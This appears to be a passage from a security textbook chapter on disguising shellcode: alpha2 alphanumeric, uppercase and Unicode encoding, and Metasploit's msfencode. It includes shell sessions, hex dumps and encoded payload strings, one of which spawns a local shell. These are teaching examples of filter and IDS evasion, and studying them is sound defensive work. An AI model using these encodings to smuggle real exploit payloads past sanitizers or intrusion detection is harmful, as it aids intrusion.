Disguising Shellcode

Injected shellcode doesn't always reach memory untouched. It can pass through functions that reject or alter the payload; for example, str*() functions will truncate the payload at the first NUL byte. Some functions sanitize their input, for instance by checking that all characters are alphanumeric. Others transform it (e.g., into uppercase). And last but not least, classic payloads may be detected by an IDS.
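As a rough illustration of these constraints, the following Python sketch reports which of the three filters a byte string would pass through unchanged. The function name check_payload and the sample bytes are hypothetical, chosen only for this example; real filters may differ in detail.

```python
import string

# Byte values of ASCII letters and digits
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))


def check_payload(payload: bytes) -> dict:
    """Report which of the filters described above the payload would survive."""
    return {
        # str*() functions stop copying at the first 0x00 byte
        "no_nul": 0 not in payload,
        # a sanitizer that only accepts letters and digits
        "alphanumeric": all(b in ALNUM for b in payload),
        # an uppercase conversion must leave every byte unchanged
        "survives_upper": payload.upper() == payload,
    }


if __name__ == "__main__":
    # Hypothetical sample inputs, not real shellcode
    for sample in (b"\xeb\x10hello\x00", b"abc123", b"ABC123"):
        print(sample, check_payload(sample))
```

Only the last sample passes all three checks, which is the property the uppercase encoders discussed later in this section aim for.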

Thus, it is very desirable to control the shape of a payload: to avoid forbidden characters, or to mutate it so that an IDS looking for known patterns does not detect it. Shellcode written by hand can be given those properties, but it is usually more convenient to create shellcode without those limitations and change its shape later. A common approach is to hand-write a loader that has the required properties and can decode any payload, and then to append the encoded shellcode to it. Many tools can automate this step.
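The encoding half of that approach can be sketched with the simplest possible scheme, a single-byte XOR. This is only an illustration under stated assumptions: the helper names xor_encode and find_key are hypothetical, the sample payload is made up, and the loader stub that would undo the XOR at run time (itself written to respect the same constraints) is not shown. It is not how alpha2 or any particular tool works.

```python
def xor_encode(payload: bytes, key: int) -> bytes:
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in payload)


def find_key(payload: bytes, forbidden: bytes):
    """Return (key, encoded) for the first key whose output avoids all
    forbidden bytes, or None if no single-byte key works."""
    bad = set(forbidden)
    for key in range(1, 256):
        if key in bad:
            continue  # the key is embedded in the loader, so it must be allowed too
        encoded = xor_encode(payload, key)
        if bad.isdisjoint(encoded):
            return key, encoded
    return None


if __name__ == "__main__":
    payload = b"\x31\xc0\x00\x00\x41"  # hypothetical bytes containing NULs
    result = find_key(payload, forbidden=b"\x00")
    if result is not None:
        key, encoded = result
        print(hex(key), encoded.hex())
        # Decoding with the same key gives the original payload back
        assert xor_encode(encoded, key) == payload
```

A single-byte key fails as soon as the payload uses every byte value, which is one reason real encoders rely on wider keys or other transformations.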

alpha2 is a shellcode encoder for x86 that is able to transform an arbitrary sequence of instructions into a fully alphanumeric one. It also provides uppercase output and shellcode capable of being converted into Unicode.

One problem with alphanumeric shellcode on x86 is not entirely resolved, though. The in-place decoding technique needs to know the address at which the shellcode has been injected. A piece of code that recovers this address is classically called getPC[31] code. There is no known alphanumeric getPC code yet. One current solution uses Structured Exception Handlers (SEH) on Windows. It works well, but it is not universal. Another common solution is to provide the shellcode with its position, or with a place to get it from. Either way, there is no one-size-fits-all solution.

Once we get specific about platforms and operating systems, things get a lot easier. If the target is on Windows, we can use the SEH getPC. On Unix, if we target a specific vulnerability, then we know the state of the process at the time of exploitation. Since the shellcode has been injected somewhere, the address of this "somewhere" should be stored in some place. This is the place we have to know before generating the shellcode.

For example, let's test the encoded shellcode with the loader presented earlier in this chapter in the section "A Shellcode Loader." The way the shellcode is called is:

0x080484e4 <main+240>:  call   *%eax

This means that when the shellcode gets called, EAX points to it. Thus, we just have to tell alpha2 to generate a shellcode that will use the content of the EAX register to learn its location and decode its payload:

$ alpha2 eax < hello.egg > alpha.egg
$ chmod +x alpha.egg
$ ./alpha.egg
Hello world!
$ cat alpha.egg
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o
3l5YoKO9oK3JLwlilnm1mHXNmoCBxuP7p5PnYuSWps0Wp8s95nm65jx1vy5K9kaMSytJPMofaC0c05P
MhfdUP5PUPLzVn30ePWpRsNikKzmmPqKoyzXv3OKtEwpUPGpXMopQKlMau8tqK1NQOkyO3CxQurLrL2
OwP1grO0rRLU4wQUZUPGzA

Obviously, if we do the same with another register, it will not work:

$ alpha2 ebx < hello.egg > alpha.egg
$ ./alpha.egg
Segmentation fault (core dumped)

alpha2 is also able to generate shellcode that contains only uppercase characters. Such shellcode survives any data manipulation that converts input to uppercase:

$ alpha2 --uppercase eax < hello.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIF5MYZEPWQFPSJHUPC05P
EP1KMQO3JUKOKOKOLCJL5LKLLMSM9HLM83PX5PEPUPOIC330C030JSOULMPU8XSVY5K9N1LCJDJPOOE
QUPEPS0OHS45PUPS0OJTNEPS0UPV3MYKK8MMPQKLIZXQCOKUUUP5PS0XMMPQKLMREL41KQNQOXIISW8
U5RLRLROWPRWROT2BLU4Q14JUPDJA

Many Windows programs convert their input to UTF-16. For an ASCII string, this conversion inserts a NUL byte after each original byte (on little-endian architectures). alpha2 can generate a string that, once passed through an ASCII-to-UTF-16 conversion, becomes equivalent to the shellcode provided as input.
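The effect of that conversion on an ASCII string can be sketched in a few lines of Python. The helper name widen and the sample string are hypothetical and serve only to show the byte layout.

```python
def widen(data: bytes) -> bytes:
    """Simulate an ASCII to little-endian UTF-16 conversion."""
    return data.decode("ascii").encode("utf_16_le")


if __name__ == "__main__":
    sample = b"PYII"  # hypothetical input string
    wide = widen(sample)
    print(wide)        # every original byte is followed by 0x00
    print(wide[0::2])  # even offsets: the original bytes
    print(wide[1::2])  # odd offsets: the inserted NUL bytes
    # The generic "utf_16" codec also prepends a two-byte byte-order mark,
    # which is not part of the converted string itself.
    print(sample.decode("ascii").encode("utf_16")[:2])
```

The encoded shellcode therefore has to be built so that the instructions still make sense once a 0x00 byte sits between every pair of its bytes.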

First, turn the shellcode into a string suitable for transformation:

$ ./alpha2 --nocompress --unicode eax < binsh.egg > binsh.unicode.not.egg.yet

Then simulate what would occur during an ASCII to UTF-16 translation with this small Python code:

>>> # Read and write in binary mode so the bytes are not altered
>>> not_egg_yet = open("binsh.unicode.not.egg.yet", "rb").read()
>>> egg = not_egg_yet.decode("ascii").encode("utf_16_le")
>>> open("binsh.unicode.egg", "wb").write(egg)

Finally, run it:

$ chmod +x ./binsh.unicode.egg
$ ./binsh.unicode.egg
sh-3.1$

Metasploit Framework comes with a program called msfencode that can encode shellcode. It provides many encoding techniques suitable for most cases on x86. Support for other architectures tends to be poor, as the list of existing encoders shows:

$ ./msfencode -l
Framework Encoders
==================

    Name                    Rank        Description
    ----                    ----        -----------
    cmd/generic_sh          normal      Generic Shell Variable Substitution Command
                                        Encoder
    generic/none            normal      The "none" Encoder
    ppc/longxor             normal      PPC LongXOR Encoder
    ppc/longxor_tag         normal      PPC LongXOR Encoder
    sparc/longxor_tag       normal      SPARC DWORD XOR Encoder
    x86/alpha_mixed         low         Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low         Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  average     Avoid UTF8/tolower
    x86/call4_dword_xor     normal      Call+4 Dword XOR Encoder
    x86/countdown           normal      Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal      Variable-length Fnstenv/mov Dword XOR
                                        Encoder
    x86/jmp_call_additive   great       Polymorphic Jump/Call XOR Additive Feedback
                                        Encoder
    x86/nonalpha            low         Non-Alpha Encoder
    x86/nonupper            low         Non-Upper Encoder
    x86/shikata_ga_nai      excellent   Polymorphic XOR Additive Feedback Encoder
    x86/unicode_mixed       low         Alpha2 Alphanumeric Unicode Mixedcase
                                        Encoder
    x86/unicode_upper       low         Alpha2 Alphanumeric Unicode Uppercase Encoder

Table 10-1 lists the supported options.

Let's examine msfencode, beginning with this shellcode generated by GCC:

$ ./hello.egg
Hello world!
$ hd hello.egg
00000000  55 89 e5 57 56 53 e8 00  00 00 00 5b 81 c3 f5 ff  |U..WVS.....[....|
00000010  ff ff 83 ec 1c fc 8d 7d  d8 8d b3 58 00 00 00 b9  |.......}...X....|
00000020  03 00 00 00 f3 a5 8d 55  d8 66 a5 89 d1 83 e4 f0  |.......U.f......|
00000030  bf 01 00 00 00 b8 04 00  00 00 ba 0e 00 00 00 53  |...............S|
00000040  89 fb cd 80 5b 89 f8 53  bb 05 00 00 00 cd 80 5b  |....[..S.......[|
00000050  8d 65 f4 5b 5e 5f c9 c3  48 65 6c 6c 6f 20 77 6f  |.e.[^_..Hello wo|
00000060  72 6c 64 21 0a 00 0a                              |rld!...|
00000067
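To see how such a payload would fare against str*() functions, the dump above can be turned back into bytes and inspected. The following Python sketch does that; the parser name parse_hd is hypothetical, and it assumes the hd layout shown here (offset, hex bytes, then an ASCII column between '|' characters).

```python
HELLO_EGG_DUMP = """\
00000000  55 89 e5 57 56 53 e8 00  00 00 00 5b 81 c3 f5 ff  |U..WVS.....[....|
00000010  ff ff 83 ec 1c fc 8d 7d  d8 8d b3 58 00 00 00 b9  |.......}...X....|
00000020  03 00 00 00 f3 a5 8d 55  d8 66 a5 89 d1 83 e4 f0  |.......U.f......|
00000030  bf 01 00 00 00 b8 04 00  00 00 ba 0e 00 00 00 53  |...............S|
00000040  89 fb cd 80 5b 89 f8 53  bb 05 00 00 00 cd 80 5b  |....[..S.......[|
00000050  8d 65 f4 5b 5e 5f c9 c3  48 65 6c 6c 6f 20 77 6f  |.e.[^_..Hello wo|
00000060  72 6c 64 21 0a 00 0a                              |rld!...|
00000067
"""


def parse_hd(dump: str) -> bytes:
    """Rebuild the raw bytes from an hd-style hex dump."""
    out = bytearray()
    for line in dump.splitlines():
        # Drop the ASCII column, which starts at the first '|'
        hex_part = line.split("|", 1)[0]
        fields = hex_part.split()
        # The first field is the offset; the final line holds only an offset
        out += bytes(int(field, 16) for field in fields[1:])
    return bytes(out)


if __name__ == "__main__":
    data = parse_hd(HELLO_EGG_DUMP)
    print("size:", len(data))                   # 103
    print("NUL bytes:", data.count(0))          # 23
    print("first NUL at offset:", data.index(0))  # 7
```

With the first 0x00 at offset 7, a str*() function would copy only the first seven bytes of this shellcode.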

Note that there are many 0x00 bytes, which would stop str*() functions, so the injection would be partial. We need to remove them. By default, msfencode uses only the shikata ga nai encoder (a Japanese colloquialism roughly translatable as "there is no choice" or "it can't be helped"). We have to add the constraint of avoiding 0x00 bytes with the -b '\x00' option. msfencode will try all encoders, ordered by rank, until one returns an acceptable result:

$ ./msfencode -t raw -b '\x00' < hello.egg > encoded.egg
[*] x86/shikata_ga_nai succeeded, final size 131

$ chmod +x encoded.egg
$ ./encoded.egg
Hello world!

Now we have a 131-byte shellcode equivalent to the original 103-byte shellcode, but without any NUL bytes:

$ hd encoded.egg
00000000  db c4 d9 74 24 f4 58 29  c9 b1 1b bb 9d aa 66 bf  |...t$.X)......f.|
00000010  31 58 17 83 e8 fc 03 c5  b9 84 4a a0 34 ad e2 1c  |1X........J.4...|
00000020  14 c6 0d a0 9a 16 55 21  59 e3 96 de a1 8f 85 3c  |......U!Y......<|
00000030  a2 1d 28 e4 d7 ad 8b 14  e8 d1 92 17 e8 d1 e4 e4  |..(.............|
00000040  4d 5c b1 d2 e8 fa b3 33  77 e0 34 0c 79 e9 b4 72  |M\.....3w.4.y..r|
00000050  c2 ed b4 72 32 54 ba 72  32 a8 90 fb c9 65 96 a0  |...r2T.r2....e..|
00000060  a4 8e c4 ed b2 6e eb 11  70 ee b0 9c ef 1b 1d c0  |.....n..p.......|
00000070  b0 2a 61 b4 2b c1 0a 2b  94 6e bc c1 b8 f4 63 2f  |.*a.+..+.n....c/|
00000080  41 ff 63                                          |A.c|
00000083

msfencode also includes encoders borrowed from the alpha2 tool, such as the uppercase alphanumeric encoder:

$ ./msfencode -t raw -e x86/alpha_upper < binsh.egg > binsh_alpha.egg
[*] x86/alpha_upper succeeded, final size 141

$ cat binsh_alpha.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIFQIPF0E6F0E6BHFMD0M
YJFBHFOD3CXNJK0D4GTESNJE8FOBBCYBNLIJCF0QFQCLIKQK9HBNPDKHMK0HLAA
$ chmod +x binsh_alpha.egg
$ ./binsh_alpha.egg
sh-3.1$


[31] PC stands for Program Counter, i.e., the register that keeps the address of the currently executed instruction. It is called EIP on x86.